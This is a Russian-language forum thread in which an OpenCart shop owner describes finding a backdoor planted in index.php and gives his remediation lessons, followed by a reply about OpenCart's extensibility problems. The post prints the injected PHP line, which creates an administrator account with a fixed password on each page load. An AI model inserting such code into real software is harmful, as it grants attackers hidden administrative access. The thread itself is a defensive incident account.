Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

История одной то ли шутки, то ли взлома


imanager

Recommended Posts

Сегодня утром мне понадобилось создать еще одного пользователя. Зашел в админку и ужаснулся - на странице пользователей создано 400 с лишним записей с логином test, одинаковой почтой и всеми другими данными. В холодном поту я их все поудалял, удалил все FTP аккаунты, сменил пароль на базу данных и пароли для всех пользователей.

Но это не помогло, пользователи (с админским доступом!) продолжали появляться.

 

Я не очень осведомлен во всех этих премудростях, поэтому все что мне пришло в голову - копать статистику сервера. Магазин еще в люди не выпущен (это не столько бизнес, сколько  долгоиграющее хобби типа рыбалки, только ловля в будет в интернете), соответственно заходят пока только те, кто наполняют сайт, и я решил, что по IP можно что-то там проанализировать и понять. Но ковыряния эти ни к чему не привели, и я пошел другим путем.

 

Скачал программку для сравнения файлов WinMerge, скачал файлы сайта, задал маску *.php, и поставил сравнение с двухдневным бекапом сайта.

 

Кака сразу нашлась, какой-то шутник в index.php вставил код, все остальные файлы были неизменны:

$db->query("INSERT INTO `" . DB_PREFIX . "user` SET username = 'test', salt = '" . $db->escape($salt = substr(md5(uniqid(rand(), true)), 0, 9)) . "', password = '" . $db->escape(sha1($salt . sha1($salt . sha1('test123')))) . "', firstname = 'test', lastname = 'log', email = '[email protected]', user_group_id = '1', status = '1', date_added = NOW()");

Код был удален, и пока что все ок.

 

Остался открытым вопрос, кто это мог сделать. За это время я давал доступ паре-тройке программистов (буржуазных и местных), когда установленные модули не хотели работать так как им полагалось. Но при этом я дурень, доступы эти потом не снимал. Поэтому кто из них мог оставить такой привет, остается только догадываться. Я вроде ни с кем не ругался, и все свои обязательства выполняю аккуратно.

 

Хуже будет, если это сделал человек, не имеющий изначально доступа. Но как это проверить, я пока не знаю.

 

Из этой всей истории я сделал для себя несколько очень важных выводов:

 

  • нужно делать бекапы как можно чаще, даже если вы не меняли сайт, делать раз в сутки например, это очень полезно
  • посторонним людям давать доступ только разовый, и потом сразу же его закрывать
  • программка для сравнения файлов как нельзя лучше подойдет для вылавливания багов

 

Я понимаю, что многим умудренным вебмастерам эти выводы очевидны, но все-таки решил поделиться, наверняка есть такие же неопытные товарищи, как я.

 

P.S. Если это была чья-то шутка, то я благодарен шутникам за то, что она оказалась довольно безобидна, и за приобретенный бесценный опыт. А если все-таки кто-то взломал сайт, то буду отписываться здесь о дальнейшем развитии событий. Спасибо что дочитали до конца

Надіслати
Поділитися на інших сайтах


Да, это одна из очень существенных проблем опенкарта: 

К огромному сожалению в опенкарте нету нормальной системы API, чтобы можно было с помощью например хуков, как в Друпале  внести изменения в движок не затрагивая другие файлы.  Вместо этого присутствует или костыль под названием vqmod или изменения приходится вносить вручную, изменяя файлы движка, что в других движках вообще считается дикостью, но в опенкарте это норма. Из-за этого возникает 95% всех проблем с модулями. И решить эти проблемы кроме как предоставить разработчику фтп доступ к сайту пользователя, если он далек от программирования, невозможно. 

А разработчики они ведь разные бывают.. кто-то честно внесет изменения и выйдет, а какое-то падло добавит на сайт код вируса или оставит для себя лазейку доступа в админку.. А кто-то может сделать пакость не специально а по незнанию или по ошибке.. 

Трагедия в том, что иначе как предоставить фтп доступ разработчику проблему не решить. Разве что или самому учить программирование или нанять 1 программиста чтобы только он 1 имел доступ и вносил все изменения в сайт.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.